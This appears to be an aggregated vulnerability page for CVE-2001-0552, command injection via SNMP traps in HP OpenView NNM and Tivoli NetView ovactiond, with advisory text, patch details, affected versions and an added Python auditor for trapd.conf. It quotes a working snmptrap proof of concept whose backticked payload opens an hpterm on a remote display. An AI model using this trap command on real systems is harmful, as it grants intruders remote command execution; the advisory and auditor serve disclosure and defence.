CVE-2001-0552
CVSS 10.0
Published: 2001-09-20 00:00:00
Last modified: 2016-10-17 22:11:30

[Original] ovactiond in HP OpenView Network Node Manager (NNM) 6.1 and Tivoli Netview 5.x and 6.x allows remote attackers to execute arbitrary commands via shell metacharacters in a certain SNMP trap message.


[CNNVD] OpenView NNM OVActionD Remote Command Execution Vulnerability (CNNVD-200109-108)

        
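        ovactiond is a component of Hewlett-Packard's (HP) OpenView and of NetView from Tivoli, an IBM subsidiary. These products are used to manage large systems and networks. ovactiond contains a serious security vulnerability that an intruder can use to escalate privileges and execute arbitrary commands. As a result, the intruder can obtain administrator privileges on the affected computer.
        ovactiond is the SNMP trap and event handler for OpenView and NetView. It contains a security vulnerability that lets an intruder send a malicious message to the management server and execute arbitrary commands. These commands run with the privileges of the ovactiond process, which differ from one operating system to another.
        The problem lies in the following definition in trapd.conf:
        #
        EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.60000208 "Configuration Alarms" Warning
        FORMAT Generic NNM to MgX message. $12
        EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10 1.3.[snip...]
        #
        User-supplied data is passed to EXEC for execution.
        
        OpenView version 6.1 in its default configuration is affected by this vulnerability. Versions earlier than 6.1 are not affected in their default configuration, but there are reports that versions earlier than 6.1 may also be affected once the user has customized the trapd.conf file.
        Tivoli NetView versions 5.x and 6.x in their default configuration are not affected by this vulnerability, but customized setups may be.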
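
As an added illustration (not part of the original advisory and not HP or IBM code), the following Python audit scans a trapd.conf for the pattern described above: EXEC actions whose command line embeds trap-supplied variables ($N). The record layout is assumed from the excerpt on this page; the sample configuration, including the hypothetical Example_Static event, its OID and its script path, is constructed.

```python
import re
from dataclasses import dataclass

# Record layout assumed from the excerpt on this page:
#   EVENT <name> <oid> "<category>" <severity>
#   FORMAT <text>
#   EXEC <command line>
EVENT_RE = re.compile(r'^EVENT\s+(\S+)\s+(\S+)\s+"([^"]*)"\s+(\S+)')
VARBIND_RE = re.compile(r"\$(\d+)")  # $10, $12: values taken from the trap

@dataclass
class Finding:
    event: str
    oid: str
    line_no: int
    varbinds: list
    command: str

def audit_trapd_conf(text):
    """Return EXEC actions whose command line embeds trap-supplied values."""
    findings, event, oid = [], None, None
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        m = EVENT_RE.match(line)
        if m:
            event, oid = m.group(1), m.group(2)
        elif line.startswith("EXEC ") and event is not None:
            command = line[5:].strip()
            varbinds = sorted({int(n) for n in VARBIND_RE.findall(command)})
            if varbinds:  # sender-controlled text reaches the command line
                findings.append(Finding(event, oid, line_no, varbinds, command))
    return findings

# Constructed sample. The first event follows the page's excerpt with the
# elided tail of the EXEC line left out; the second is hypothetical.
SAMPLE = """\
#
EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.60000208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10
#
EVENT Example_Static .1.3.6.1.4.1.99999.0.1 "Status Alarms" Normal
FORMAT Static action, no trap data used. $1
EXEC /usr/local/bin/log_event.sh static-marker
"""

if __name__ == "__main__":
    for f in audit_trapd_conf(SAMPLE):
        print(f"line {f.line_no}: {f.event} EXEC uses varbinds {f.varbinds}: {f.command}")
```

Only the first event is reported: its EXEC line interpolates $10, while the second event's FORMAT line uses $1 but its EXEC command is fixed.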
        

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:ibm:tivoli_netview:6.0  Tivoli NetView 6.0
cpe:/a:ibm:tivoli_netview:5.0  Tivoli NetView 5.0
cpe:/a:hp:openview_network_node_manager:6.1  HP OpenView Network Node Manager 6.1
cpe:/a:hp:openview_network_node_manager:5.01  HP OpenView Network Node Manager 5.01

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0552
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0552
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-108
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=99201278704545&w=2
(UNKNOWN)  BUGTRAQ  20010608 HP Openview NNM6.1 ovactiond bin exploit
http://www.cert.org/advisories/CA-2001-24.html
(VENDOR_ADVISORY)  CERT  CA-2001-24
http://www.kb.cert.org/vuls/id/952171
(VENDOR_ADVISORY)  CERT-VN  VU#952171
http://www.securityfocus.com/bid/2845
(VENDOR_ADVISORY)  BID  2845

- Vulnerability information

OpenView NNM OVActionD Remote Command Execution Vulnerability
Critical  Input validation
2001-09-20 00:00:00 2005-10-20 00:00:00
Remote
        
        

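- Advisories and patches

        Vendor patches:
        HP
        --
        HP has released a security bulletin (HPSBUX0106-154) and corresponding patches for this issue:
        HPSBUX0106-154:ec. Vulnerability in OpenView NNM
        HP OpenView Network Node Manager 6.2 is not affected. Patches for version 6.1 and earlier can be downloaded from the following locations:
        HP OpenView Network Node Manager 5.0 1:
        HP OpenView Network Node Manager 6.1: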
         HP Patch HP-UX 10.20 PHSS_24442
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch HP-UX 11.00 PHSS_24443
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch Solaris 2.x PSOV_02956
        
        http://ovweb.external.hp.com/cpe/patches/

         HP Patch WinNT4.X/2000 NNM_00743
        
        http://ovweb.external.hp.com/cpe/patches/

        IBM
        ---
        The vendor has released an upgrade patch that fixes this security issue; please download it from the vendor's home page:
        IBM Tivoli NetView 5.0:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

        IBM Tivoli NetView 5.1:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

        IBM Tivoli NetView 6.0:
         IBM Patch Tivoli ovactiond update
        
        http://www.tivoli.com/support/

- Vulnerability information (20909)

IBM Tivoli NetView 5/6 OVActionD SNMPNotify Command Execution Vulnerability (EDBID:20909)
multiple remote
2001-06-08 Verified
0 Milo van der Zee
N/A
source: http://www.securityfocus.com/bid/2845/info

ovactiond is part of the system management software packages OpenView and Netview, distributed by HP and IBM. It is designed for use on enterprise systems, and offers remote administrative facilities.

A problem with the software makes it possible for a remote user to execute commands on a managed system with the privileges of the ovactiond process (often 'bin' on Unix systems). The default configuration of the daemon as installed with HP OpenView enables the execution of commands upon receiving a trap with the command encapsulated in quotes and escapes. Tivoli Netview is not vulnerable to this by default, but may be if customized.

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s "" 		

- Vulnerability information

11341
HP OpenView NNM/Tivoli NetView ovactiond Arbitrary Command Execution
Remote / Network Access
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-06-08 Unknown
2001-06-08 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

OVActionD SNMPNotify Command Execution Vulnerability
Input Validation Error 2845
Yes No
2001-06-08 12:00:00 2009-07-11 06:56:00
This vulnerability was announced to Bugtraq by Milo van der Zee <milo.van.der.zee@ordina.nl> on June 8, 2001.

- Affected program versions

IBM Tivoli NetView 6.0
- Compaq Tru64 5.1
- Compaq Tru64 5.0 f
- Compaq Tru64 5.0 a
- Compaq Tru64 5.0
- Compaq Tru64 4.0 g
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM Tivoli NetView 5.1
IBM Tivoli NetView 5.0
HP OpenView Network Node Manager 6.10
- HP HP-UX 11.0
- HP HP-UX 10.20
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 5.0 1
- HP HP-UX 11.0
- HP HP-UX 10.20
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 6.2

- Unaffected program versions

HP OpenView Network Node Manager 6.2

- Solution

Version 6.2 is not vulnerable.

HP has stated that versions prior to 6.1 are not vulnerable by default. It is possible that they may be vulnerable with a custom configuration. Administrators using versions older than 6.1 are advised to upgrade to 6.2.

Patches available for version 6.1:


IBM Tivoli NetView 5.0

IBM Tivoli NetView 5.1

IBM Tivoli NetView 6.0

HP OpenView Network Node Manager 6.10
